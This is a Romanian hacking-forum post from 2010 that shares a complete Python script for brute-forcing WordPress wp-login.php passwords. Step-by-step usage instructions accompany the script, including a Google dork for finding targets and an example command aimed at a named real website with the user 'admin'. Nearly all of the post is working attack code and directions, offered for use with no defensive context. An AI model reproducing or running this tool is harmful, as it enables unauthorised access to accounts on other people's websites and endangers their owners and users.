OlteniaOnline
Doriți să reacționați la acest mesaj? Creați un cont în câteva clickuri sau conectați-vă pentru a continua.

OlteniaOnline

Forum destinat discutiilor pe orice tema
 
Acasawwww.tributaryoUltimele imaginiCăutareÎnregistrareConectare
Mai 2024
LunMarMierJoiVinSamDum
  12345
6789101112
13141516171819
20212223242526
2728293031  
CalendarCalendar
Căutare
 
 

Rezultate pe:
 
Rechercher Cautare avansata
Cine este conectat?
În total sunt 1 utilizatori conectați: 0 Înregistrați, 0 Invizibil și 1 Vizitator

Nici unul

Recordul de utilizatori conectați a fost de 13, Joi Apr 20, 2023 8:35 pm
Top postatori
Admin
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
Bobby
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
Caisa
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
robyzza
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
pulicica
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
Br3akz
Word-press Login Brute Force Vote_lcapWord-press Login Brute Force Voting_barWord-press Login Brute Force Vote_rcap 
Facebook
Oltenia Online

Oltenia Online


 

 Word-press Login Brute Force

In jos 
AutorMesaj
Admin
Admin
Admin


Mesaje : 185
Data de înscriere : 04/11/2010
Varsta : 31
Localizare : Bals

Word-press Login Brute Force Empty
MesajSubiect: Word-press Login Brute Force   Word-press Login Brute Force Icon_minitimeVin Noi 05, 2010 1:54 pm

#!/usr/bin/python
#WordPress Brute Force (wp-login.php)

#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)

#Dork: inurl:wp-login.php

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, urllib, httplib, socket

print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"

if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
print "\t -p/-proxy <host:port> : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)

for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1

try:
if proxy:
print "\n

* Testing Proxy..."

h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "

* Proxy:",proxy

except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass

try:
if verbose == 1:
print "

* Verbose Mode On\n"

except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass

if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]

print "

* BruteForcing:",host

print "

* User:",sys.argv[2]


try:
words = open(sys.argv[3], "r").readlines()
print "

* Words Loaded:",len(words),"\n"

except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)

for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass

if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)

#Change this response if different. (language)
if re.search("<strong>ERROR</strong>",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"




Folosire
1) Copiezi tot ce e mai sus intr-un fisier gol care il redenumesti in "wordpressbf.py"
2) Trebuie sa ai python instalat in pc
3) Deschizi consola in directorul cu fisierul "py" si scrii:
Quote
python wordpressbf.py <site> <user> <wordlist> <options>

-Site: aici scrieti adresa unui site care foloseste "wp-login.php" EX: http://planetsave.com/wp-login.php
-User: aici treceti numele userului care de cele mai mule ori e "admin" sau "administrator"
-Wordlist: aici aveti nevoie de un fisier txt care contine cat mai multe parole pe care le va incerca scriptul, pe rand, sa se logheze pe site-ul respectiv cu userul specificat de voi.
-Options: avem optiuniile "-p" pentru proxy, scrieti <host:port>
"-v" ceea ce e verbose vode, adica va arata in consola fiecare parola care o incearca
EX:
Quote
python wordpressbf.py http://planetsave.com/wp-login.php admin pass.txt -v

Sus In jos
https://olteniaonline.forumgratuit.ro
 
Word-press Login Brute Force
Sus 
Pagina 1 din 1

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
OlteniaOnline :: Utilitare :: Hack and tricks :: Hack's-
Mergi direct la: